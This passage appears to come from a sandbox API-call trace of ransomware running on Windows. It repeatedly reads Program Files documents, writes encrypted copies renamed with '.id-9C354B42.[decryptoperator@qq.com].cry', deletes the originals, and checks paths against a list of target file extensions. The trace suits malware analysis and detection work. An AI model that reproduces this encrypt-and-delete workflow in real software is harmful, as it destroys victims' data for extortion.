[0049.432] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.432] lstrlenW (lpString=".jpg") returned 4 [0049.432] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.432] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.432] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0049.433] GetLastError () returned 0x0 [0049.433] ReadFile (in: hFile=0x1c4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x296a5, lpOverlapped=0x0) returned 1 [0049.476] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x296b0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x296b0, lpOverlapped=0x0) returned 1 [0049.480] ReadFile (in: hFile=0x1c4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.480] WriteFile (in: hFile=0x22c, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.480] SetEndOfFile (hFile=0x22c) returned 1 [0049.480] CloseHandle (hObject=0x22c) returned 1 [0049.480] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.480] SetEndOfFile (hFile=0x1c4) returned 1 [0049.482] CloseHandle (hObject=0x1c4) returned 1 [0049.482] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0049.482] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg")) returned 1 [0049.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.482] lstrlenW (lpString=".doc") returned 4 [0049.482] lstrcmpiW (lpString1=".doc", lpString2=".MSG") returned -1 [0049.482] lstrlenW (lpString=".docx") returned 5 [0049.482] lstrcmpiW (lpString1=".docx", lpString2="T.MSG") returned -1 [0049.482] lstrlenW (lpString=".pdf") returned 4 [0049.482] lstrcmpiW (lpString1=".pdf", lpString2=".MSG") returned 1 [0049.482] lstrlenW (lpString=".xls") returned 4 [0049.482] lstrcmpiW (lpString1=".xls", lpString2=".MSG") returned 1 [0049.483] lstrlenW (lpString=".xlsx") returned 5 [0049.483] lstrcmpiW (lpString1=".xlsx", lpString2="T.MSG") returned -1 [0049.483] lstrlenW (lpString=".ppt") returned 4 [0049.483] lstrcmpiW (lpString1=".ppt", lpString2=".MSG") returned 1 [0049.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.483] lstrlenW (lpString=".zip") returned 4 [0049.483] lstrcmpiW (lpString1=".zip", lpString2=".MSG") returned 1 [0049.483] lstrlenW (lpString=".rar") returned 4 [0049.483] lstrcmpiW (lpString1=".rar", lpString2=".MSG") returned 1 [0049.483] lstrlenW (lpString=".bz2") returned 4 [0049.483] lstrcmpiW (lpString1=".bz2", lpString2=".MSG") returned -1 [0049.483] lstrlenW (lpString=".7z") returned 3 [0049.483] lstrcmpiW (lpString1=".7z", lpString2="MSG") returned -1 [0049.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.483] lstrlenW (lpString=".dbf") returned 4 [0049.483] lstrcmpiW (lpString1=".dbf", lpString2=".MSG") returned -1 [0049.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.483] lstrlenW (lpString=".1cd") returned 4 [0049.483] lstrcmpiW (lpString1=".1cd", lpString2=".MSG") returned -1 [0049.483] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90 [0049.483] lstrlenW (lpString=".jpg") returned 4 [0049.483] lstrcmpiW (lpString1=".jpg", lpString2=".MSG") returned -1 [0050.313] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.313] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0050.313] GetLastError () returned 0x0 [0050.313] ReadFile (in: hFile=0x21c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x4360, lpOverlapped=0x0) returned 1 [0050.321] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x4370, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x4370, lpOverlapped=0x0) returned 1 [0050.322] ReadFile (in: hFile=0x21c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.322] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0050.322] SetEndOfFile (hFile=0x1c4) returned 1 [0050.322] CloseHandle (hObject=0x1c4) returned 1 [0050.322] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.322] SetEndOfFile (hFile=0x21c) returned 1 [0050.323] CloseHandle (hObject=0x21c) returned 1 [0050.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.323] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl")) returned 1 [0050.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0050.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0050.372] lstrlenW (lpString=".doc") returned 4 [0050.372] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0050.412] lstrlenW (lpString=".docx") returned 5 [0050.412] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0050.412] lstrlenW (lpString=".pdf") returned 4 [0050.412] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0050.412] lstrlenW (lpString=".xls") returned 4 [0050.412] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0050.412] lstrlenW (lpString=".xlsx") returned 5 [0050.412] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0050.412] lstrlenW (lpString=".ppt") returned 4 [0050.412] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0050.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0050.412] lstrlenW (lpString=".zip") returned 4 [0050.412] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0050.412] lstrlenW (lpString=".rar") returned 4 [0050.412] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0050.412] lstrlenW (lpString=".bz2") returned 4 [0050.412] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0050.412] lstrlenW (lpString=".7z") returned 3 [0050.412] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0050.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0050.412] lstrlenW (lpString=".dbf") returned 4 [0050.412] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0050.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0050.412] lstrlenW (lpString=".1cd") returned 4 [0050.412] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0050.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0050.412] lstrlenW (lpString=".jpg") returned 4 [0050.412] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0050.693] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.693] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.700] GetLastError () returned 0x0 [0050.700] ReadFile (in: hFile=0x1f4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x7d92, lpOverlapped=0x0) returned 1 [0050.807] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x7da0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x7da0, lpOverlapped=0x0) returned 1 [0050.808] ReadFile (in: hFile=0x1f4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.808] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0050.810] SetEndOfFile (hFile=0x178) returned 1 [0050.810] CloseHandle (hObject=0x178) returned 1 [0050.810] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.810] SetEndOfFile (hFile=0x1f4) returned 1 [0050.811] CloseHandle (hObject=0x1f4) returned 1 [0050.811] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.811] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl")) returned 1 [0050.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0050.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0050.811] lstrlenW (lpString=".doc") returned 4 [0050.811] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0050.811] lstrlenW (lpString=".docx") returned 5 [0050.811] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0050.811] lstrlenW (lpString=".pdf") returned 4 [0050.812] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0050.812] lstrlenW (lpString=".xls") returned 4 [0050.812] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0050.812] lstrlenW (lpString=".xlsx") returned 5 [0050.812] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0050.812] lstrlenW (lpString=".ppt") returned 4 [0050.812] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0050.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0050.812] lstrlenW (lpString=".zip") returned 4 [0050.812] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0050.812] lstrlenW (lpString=".rar") returned 4 [0050.812] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0050.812] lstrlenW (lpString=".bz2") returned 4 [0050.812] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0050.812] lstrlenW (lpString=".7z") returned 3 [0050.812] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0050.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0050.812] lstrlenW (lpString=".dbf") returned 4 [0050.812] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0050.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0050.812] lstrlenW (lpString=".1cd") returned 4 [0050.812] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0050.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0050.812] lstrlenW (lpString=".jpg") returned 4 [0050.812] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0050.845] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.845] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0050.846] GetLastError () returned 0x0 [0050.846] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x3a19, lpOverlapped=0x0) returned 1 [0050.855] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x3a20, lpOverlapped=0x0) returned 1 [0050.856] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.856] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.856] SetEndOfFile (hFile=0x1c4) returned 1 [0050.863] CloseHandle (hObject=0x1c4) returned 1 [0050.864] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.864] SetEndOfFile (hFile=0x190) returned 1 [0050.865] CloseHandle (hObject=0x190) returned 1 [0050.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.865] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif")) returned 1 [0050.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.898] lstrlenW (lpString=".doc") returned 4 [0050.898] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.898] lstrlenW (lpString=".docx") returned 5 [0050.898] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.898] lstrlenW (lpString=".pdf") returned 4 [0050.898] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.898] lstrlenW (lpString=".xls") returned 4 [0050.898] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.898] lstrlenW (lpString=".xlsx") returned 5 [0050.898] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.898] lstrlenW (lpString=".ppt") returned 4 [0050.898] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.898] lstrlenW (lpString=".zip") returned 4 [0050.898] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.898] lstrlenW (lpString=".rar") returned 4 [0050.898] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.898] lstrlenW (lpString=".bz2") returned 4 [0050.898] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.898] lstrlenW (lpString=".7z") returned 3 [0050.898] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.898] lstrlenW (lpString=".dbf") returned 4 [0050.898] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.898] lstrlenW (lpString=".1cd") returned 4 [0050.898] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63 [0050.898] lstrlenW (lpString=".jpg") returned 4 [0050.898] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.899] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=8097) returned 1 [0050.899] CloseHandle (hObject=0x22c) returned 1 [0050.899] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif")) returned 0x20 [0050.899] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0050.899] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.899] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0050.900] GetLastError () returned 0x0 [0050.900] ReadFile (in: hFile=0x22c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x1fa1, lpOverlapped=0x0) returned 1 [0050.906] WriteFile (in: hFile=0x214, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x1fb0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x1fb0, lpOverlapped=0x0) returned 1 [0050.907] ReadFile (in: hFile=0x22c, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.907] WriteFile (in: hFile=0x214, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.907] SetEndOfFile (hFile=0x214) returned 1 [0050.907] CloseHandle (hObject=0x214) returned 1 [0050.907] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.907] SetEndOfFile (hFile=0x22c) returned 1 [0050.908] CloseHandle (hObject=0x22c) returned 1 [0050.908] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.909] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif")) returned 1 [0050.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.909] lstrlenW (lpString=".doc") returned 4 [0050.909] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.909] lstrlenW (lpString=".docx") returned 5 [0050.909] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.909] lstrlenW (lpString=".pdf") returned 4 [0050.909] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.909] lstrlenW (lpString=".xls") returned 4 [0050.909] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.909] lstrlenW (lpString=".xlsx") returned 5 [0050.909] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.909] lstrlenW (lpString=".ppt") returned 4 [0050.909] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.909] lstrlenW (lpString=".zip") returned 4 [0050.909] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.909] lstrlenW (lpString=".rar") returned 4 [0050.909] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.909] lstrlenW (lpString=".bz2") returned 4 [0050.909] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.909] lstrlenW (lpString=".7z") returned 3 [0050.909] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.909] lstrlenW (lpString=".dbf") returned 4 [0050.909] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.909] lstrlenW (lpString=".1cd") returned 4 [0050.909] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0050.910] lstrlenW (lpString=".jpg") returned 4 [0050.910] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.910] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=7686) returned 1 [0050.910] CloseHandle (hObject=0x22c) returned 1 [0050.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif")) returned 0x20 [0050.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft 